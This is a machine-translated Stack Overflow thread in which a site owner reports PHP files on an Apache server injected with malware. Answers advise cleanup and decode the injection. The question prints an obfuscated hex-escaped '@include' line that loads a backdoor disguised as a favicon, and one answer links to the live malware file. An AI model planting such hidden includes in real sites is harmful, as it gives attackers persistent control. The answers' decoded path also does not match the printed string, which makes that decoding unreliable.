恶意软件 |我在 apache 服务器上的 php 文件正在更改答案

【问题标题】：malware | my php files on apache server is being changed恶意软件 |我在 apache 服务器上的 php 文件正在更改
【发布时间】：2018-09-06 21:30:33
【问题描述】：

我在我的服务器上遇到了错误的问题。例如，我有一个静态 html 网站。使用了几天。比链接坏了。我检查了 ftp 并看到 index.html 更改为 index.html.bak 并且有一个 index.php

这个奇怪的文件有一些加密代码。比如这样：index.phphttps://hastebin.com/xepokigeqe.xml

还有这个：xml62.php https://hastebin.com/edohitogoc.xml

这个案例破坏了我的其他 php 网络应用程序。我的一些 laravel 应用程序索引文件被注入了这些行

/*47f70*/

@include "\x2fh\x6fm\x65/\x757\x335\x362\x336\x2f1\x37n\x61p\x6fl\x69p\x69z\x7aa\x2ec\x6fm\x2fa\x73s\x65t\x73/\x69m\x61g\x65s\x2fa\x76a\x74a\x72s\x2ff\x61v\x69c\x6fn\x5f0\x344\x624\x65.\x69c\x6f";

/*47f70*/

我不知道如何解决或研究这件事。如果有人知道这件事，请帮助我。我会很高兴的。谢谢

【问题讨论】：

标签： php security code-injection malware virus

【解决方案1】：

如果可能，您应该删除所有文件，并将它们替换为您的代码的干净版本（不妥协）。

在此之后，为了调查违规行为，您应该：

更改您的 ftp 密码并检查您的 ftp 访问日志
检查您的网络服务器日志中是否有奇怪的条目（远程 php 执行）
检查你的 mysql 日志文件中是否有奇怪的查询（mysql 注入）

编码的字符串转换为

 /home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico

这很可能是一些伪装成网站图标的后门。

【讨论】：

我会试试这些。检查 favicon 文件并获得一个长时间加密的另一个 php 文件。我要清理所有这些垃圾。谢谢
我遇到了同样的问题，但不知道在哪里解码字符串。经过一番搜索，我找到了解码字符串的unphp.net。以防万一有人在寻找解码器。

【解决方案2】：

解密为 @include "/home/u7356236/bebekti.com/script/revslider/favicon_45717f.ico";

恶意软件是：http://bebekti.com/script/revslider/favicon_45717f.ico 这是一个伪装成图标文件的php文件，它解密为：https://hastebin.com/racohopene.xml

我会更改你所有的密码并确保它是安全的。

【讨论】：

刚刚清理了所有 favicon_* 和无意义的 php 文件。还注入了文件。认为它有效